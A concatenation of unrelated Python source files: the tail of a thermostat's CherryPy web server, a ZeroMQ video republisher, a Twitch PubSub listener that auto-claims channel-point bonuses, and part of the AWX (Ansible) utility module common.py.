log( LOG_LEVEL_STATE, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Starting on " + cherrypy.server.socket_host + ":" + str( cherrypy.server.socket_port ) )
conf = {
'/': {
'tools.staticdir.root': os.path.abspath( os.getcwd() ),
'tools.staticfile.root': os.path.abspath( os.getcwd() )
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': './web/css'
},
'/javascript': {
'tools.staticdir.on': True,
'tools.staticdir.dir': './web/javascript'
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': './web/images'
},
'/schedule.json': {
'tools.staticfile.on': True,
'tools.staticfile.filename': './thermostat_schedule.json'
},
'/favicon.ico': {
'tools.staticfile.on': True,
'tools.staticfile.filename': './web/images/favicon.ico'
}
}
cherrypy.config.update(
{ 'log.screen': debug,
'log.access_file': "",
'log.error_file': ""
}
)
cherrypy.quickstart ( WebInterface(), '/', conf )
##############################################################################
# #
# Main #
# #
##############################################################################
def main():
# Start Web Server
webThread = threading.Thread( target=startWebServer )
webThread.daemon = True
webThread.start()
# Start Scheduler
reloadSchedule()
schedThread = threading.Thread( target=startScheduler )
schedThread.daemon = True
schedThread.start()
# Start Thermostat UI/App
ThermostatApp().run()
if __name__ == '__main__':
try:
main()
finally:
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/shutdown", "Thermostat Shutting Down..." )
GPIO.cleanup()
if logFile is not None:
logFile.flush()
os.fsync( logFile.fileno() )
logFile.close()
if mqttEnabled:
mqttc.loop_stop()
mqttc.disconnect()
|
pub.py | import zmq
import time
import multiprocessing as mp
import pystreaming.video.interface as intf
TIMESTEP = 0.01
def pullpub_ps(shutdown, infd, outfd, rcvhwm, sndhwm):
context = zmq.Context()
socket = context.socket(zmq.PULL)
socket.setsockopt(zmq.RCVHWM, rcvhwm)
socket.bind(infd)
out = context.socket(zmq.PUB)
out.setsockopt(zmq.SNDHWM, sndhwm)
out.bind(outfd)
poller = zmq.Poller()
poller.register(socket, zmq.POLLIN)
while not shutdown.is_set():
target = time.time() + TIMESTEP
if poller.poll(0):
try:
buf, idx = intf.recv(socket, buf=True, flags=zmq.NOBLOCK)
intf.send(out, idx, buf=buf, flags=zmq.NOBLOCK)
except zmq.error.Again:
pass
missing = target - time.time()
if missing > 0:
time.sleep(missing) # loop takes at minimum TIMESTEP seconds
class Publisher:
rcvhwm = sndhwm = 10
def __init__(self, endpoint, seed=""):
"""Create a multiprocessing publisher.
Binds to a zmq PULL socket and republishes through a PUB socket.
Args:
endpoint (str): Descriptor of stream publishing endpoint.
seed (str, optional): File descriptor seed (to prevent ipc collisions). Defaults to "".
"""
self.infd = "ipc:///tmp/encout" + seed
self.outfd = endpoint
self.shutdown = mp.Event()
self.psargs = (self.shutdown, self.infd, self.outfd, self.rcvhwm, self.sndhwm)
self.ps = None
def start(self):
"""Create and start multiprocessing publisher threads.
Raises:
RuntimeError: Raised when method is called while a Publisher is running.
"""
if self.ps is not None:
raise RuntimeError("Tried to start a runnning Publisher obj")
self.ps = mp.Process(target=pullpub_ps, args=self.psargs)
self.ps.daemon = True
self.ps.start()
print(self)
def stop(self):
"""Join and destroy multiprocessing publisher threads.
Raises:
RuntimeError: Raised when method is called while a Publisher is stopped.
"""
if self.ps is None:
raise RuntimeError("Tried to stop a stopped Publisher obj")
self.shutdown.set()
self.ps.join()
self.ps = None
self.shutdown.clear()
def __repr__(self):
rpr = ""
rpr += "-----Publisher-----\n"
rpr += f"IN:\t{self.infd}\n"
rpr += f"OUT:\t{self.outfd}\n"
rpr += f"HWM:\t=IN> {self.rcvhwm})::({self.sndhwm} =OUT> "
return rpr
|
pubsub.py | import json
import threading
import time
from random import randrange
import websocket # pip install websocket-client
from claim_bonus import claim_channel_points_bonus
from raid import update_raid, Raid
from twitch_data import *
# For documentation on Twitch PubSub API, see https://dev.twitch.tv/docs/pubsub
def listen_for_channel_points():
ws_pool = WebsocketsPool()
for topic in get_needed_topics():
ws_pool.submit(topic)
def get_needed_topics():
topics = [PubsubTopic("community-points-user-v1")]
for streamer_login in get_streamer_logins():
topics.append(PubsubTopic("video-playback-by-id", streamer_login))
topics.append(PubsubTopic("raid", streamer_login))
return topics
def on_open(ws):
def run():
ping(ws)
all_topics = get_needed_topics()
for topic in all_topics:
listen_for_topic(ws, topic)
while not ws.is_closed:
ping(ws)
time.sleep(30)
threading.Thread(target=run).start()
last_message_time = 0
last_message_type = None
def on_message(ws, message):
global last_message_time, last_message_type
response = json.loads(message)
if response["type"] == "MESSAGE":
# print("Received message: ", response)
data = response["data"]
topic, topic_user = data["topic"].split(".")
message = json.loads(data["message"])
message_type = message["type"]
message_data = None
if "data" in message:
message_data = message["data"]
# If we have more than one PubSub connection, messages may be duplicated
if time.time() - last_message_time < 0.1 and last_message_type == message_type:
last_message_time = time.time()
return
last_message_time = time.time()
last_message_type = message_type
if topic == "community-points-user-v1":
if message_type == "points-earned":
channel_id = message_data["channel_id"]
if channel_id in get_streamer_ids():
new_balance = message_data["balance"]["balance"]
channel_login = get_login_by_channel_id(channel_id)
reason_name = get_reason_name(message_data["point_gain"]["reason_code"])
print(f"{new_balance} баллов канала для {channel_login}! Причина: {reason_name}.")
elif message_type == "claim-available":
channel_id = message_data["claim"]["channel_id"]
if channel_id in get_streamer_ids():
claim_id = message_data["claim"]["id"]
streamer_login = get_login_by_channel_id(channel_id)
claim_channel_points_bonus(streamer_login, claim_id)
elif topic == "video-playback-by-id":
channel_login = get_login_by_channel_id(topic_user)
if message_type == "stream-down":
set_offline(channel_login)
elif message_type == "viewcount":
check_online(channel_login)
# there is stream-up message type, but it's sent earlier than the API updates
elif topic == "raid":
channel_login = get_login_by_channel_id(topic_user)
if message_type == "raid_update_v2":
# streamer_login is going to raid someone
raid_info = message["raid"]
raid = Raid(raid_info["id"], raid_info["target_login"])
update_raid(channel_login, raid)
elif response["type"] == "RESPONSE" and len(response.get("error", "")) > 0:
raise RuntimeError(f"Error while trying to listen for a topic: {response}")
elif response["type"] == "RECONNECT":
WebsocketsPool.handle_websocket_reconnection(ws)
def get_reason_name(code):
return code.replace("_", " ").replace("CLAIM", "bonus claimed").lower()
class PubsubTopic:
def __init__(self, topic, channel_login=None):
self.topic = topic
self.channel_login = channel_login
def is_user_topic(self):
return self.channel_login is None
def __str__(self):
if self.is_user_topic():
return f"{self.topic}.{get_user_id()}"
else:
return f"{self.topic}.{get_channel_id(self.channel_login)}"
class WebsocketsPool: # you can't listen for more than 50 topics at once
def __init__(self):
self.free_websocket = None
def submit(self, pubsub_topic):
if self.free_websocket is None or len(self.free_websocket.topics) >= 50:
self.create_new_websocket()
self.free_websocket.topics.append(pubsub_topic)
if not self.free_websocket.is_opened:
self.free_websocket.pending_topics.append(pubsub_topic)
else:
listen_for_topic(self.free_websocket, pubsub_topic)
def create_new_websocket(self):
self.free_websocket = websocket.WebSocketApp("wss://pubsub-edge.twitch.tv/v1",
on_message=on_message, on_open=WebsocketsPool.on_open, on_close=WebsocketsPool.handle_websocket_reconnection)
self.free_websocket.parent_pool = self
self.free_websocket.is_closed = False
self.free_websocket.is_opened = False
self.free_websocket.topics = []
self.free_websocket.pending_topics = []
threading.Thread(target=lambda: self.free_websocket.run_forever()).start()
@staticmethod
def on_open(ws):
def run():
ws.is_opened = True
ping(ws)
for topic in ws.pending_topics:
listen_for_topic(ws, topic)
while not ws.is_closed:
ping(ws)
time.sleep(30)
threading.Thread(target=run).start()
@staticmethod
def handle_websocket_reconnection(ws):
ws.is_closed = True
print("Повторное подключение к серверу Twitch PubSub через 30 секунд")
time.sleep(30)
self = ws.parent_pool
if self.free_websocket == ws:
self.free_websocket = None
for topic in ws.topics:
self.submit(topic)
def listen_for_topic(ws, topic):
data = {"topics": [str(topic)]}
if topic.is_user_topic:
data["auth_token"] = get_auth_token()
nonce = create_nonce()
send(ws, {"type": "LISTEN", "nonce": nonce, "data": data})
def ping(ws):
send(ws, {"type": "PING"})
def send(ws, request):
request_str = json.dumps(request, separators=(',', ':'))
ws.send(request_str)
# https://en.wikipedia.org/wiki/Cryptographic_nonce
def create_nonce(length=30):
nonce = ""
for i in range(length):
char_index = randrange(0, 10 + 26 + 26)
if char_index < 10:
char = chr(ord('0') + char_index)
elif char_index < 10 + 26:
char = chr(ord('a') + char_index - 10)
else:
char = chr(ord('A') + char_index - 26 - 10)
nonce += char
return nonce
|
common.py | # Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor, ManyToManyDescriptor
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400',
'camelcase_to_underscore',
'underscore_to_camelcase',
'memoize',
'memoize_delete',
'get_licenser',
'get_awx_http_client_headers',
'get_awx_version',
'update_scm_url',
'get_type_for_model',
'get_model_for_type',
'copy_model_by_class',
'copy_m2m_relationships',
'prefetch_page_capabilities',
'to_python_boolean',
'ignore_inventory_computed_fields',
'ignore_inventory_group_removal',
'_inventory_updates',
'get_pk_from_dict',
'getattrd',
'getattr_dne',
'NoDefaultProvided',
'get_current_apps',
'set_current_apps',
'extract_ansible_vars',
'get_search_fields',
'get_system_task_capacity',
'get_cpu_capacity',
'get_mem_capacity',
'model_to_dict',
'NullablePromptPseudoField',
'model_instance_diff',
'parse_yaml_or_json',
'RequireDebugTrueOrTest',
'has_model_field_prefetched',
'set_environ',
'IllegalArgumentError',
'get_custom_venv_choices',
'get_external_account',
'task_manager_bulk_reschedule',
'schedule_task_manager',
'classproperty',
'create_temporary_fifo',
'truncate_stdout',
'deepmerge',
]
def get_object_or_400(klass, *args, **kwargs):
"""
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will return in a 400 response.
"""
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def camelcase_to_underscore(s):
"""
Convert CamelCase names to lowercase_with_underscore.
"""
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
"""
Convert lowercase_with_underscore names to CamelCase.
"""
return ''.join(x.capitalize() or '_' for x in s.split('_'))
class RequireDebugTrueOrTest(logging.Filter):
"""
Logging filter to output when in DEBUG mode or running tests.
"""
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
"""
Decorator to wrap a function and cache its result.
"""
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
def get_awx_version():
"""
Return AWX version as reported by setuptools.
"""
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
def get_awx_http_client_headers():
license = get_license().get('license_type', 'UNLICENSED')
headers = {
'Content-Type': 'application/json',
'User-Agent': '{} {} ({})'.format('AWX' if license == 'open' else 'Red Hat Ansible Tower', get_awx_version(), license),
}
return headers
def get_licenser(*args, **kwargs):
from awx.main.utils.licensing import Licenser, OpenLicense
try:
if os.path.exists('/var/lib/awx/.tower_version'):
return Licenser(*args, **kwargs)
else:
return OpenLicense()
except Exception as e:
raise ValueError(_('Error importing Tower License: %s') % e)
def update_scm_url(scm_type, url, username=True, password=True, check_special_cases=True, scp_format=False):
"""
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
"""
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'svn', 'insights', 'archive'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
# if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
# if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git.
elif scm_type == 'git':
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https'),
'archive': ('http', 'https'),
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
# raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
netloc = u':'.join([urllib.parse.quote(x, safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path, parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {'user': ['last_login'], 'oauth2accesstoken': ['last_used'], 'oauth2application': ['client_secret']}
model_name = obj._meta.model_name
fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
# see definition of from_db for CredentialType
# injection logic of any managed types are incompatible with activity stream
if model_name == 'credentialtype' and obj.managed_by_tower and obj.namespace:
fields_excluded.extend(['inputs', 'injectors'])
if fields_excluded:
allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (isinstance(field_val, str) and field_val.startswith('$encrypted$')):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
from django.db.models import Model
if not (old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not (new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
"""
Creates a new unsaved object of type Class2 using the fields from obj1
values in kwargs can override obj1
"""
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
"""
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 to field of same name, if field occurs in `fields`
"""
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
"""
Return type name for a given model class.
"""
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
"""
Return model class for a given type name.
"""
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
"""
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
"""
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(
Q(Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) | Q(**{'%s__isnull' % res_path: True}))
)
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(_('Input type `{data_type}` is not a dictionary').format(data_type=data_type))
def parse_yaml_or_json(vars_str, silent_failure=True):
"""
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, re-raise combination error if `silent_failure` if False.
"""
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_('Variables not compatible with JSON standard (error: {json_error})').format(json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(
_('Cannot parse as JSON (error: {json_error}) or ' 'YAML (error: {yaml_error}).').format(json_error=str(json_err), yaml_error=str(yaml_err))
)
return vars_dict
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
"""
Measure system memory and use it as a baseline for determining the system's capacity
"""
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
"""
Context manager to ignore updating inventory computed fields.
"""
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times."""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
"""
Context manager to ignore moving groups/hosts when group is deleted.
"""
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
"""
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
"""
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
def get_pk_from_dict(_dict, key):
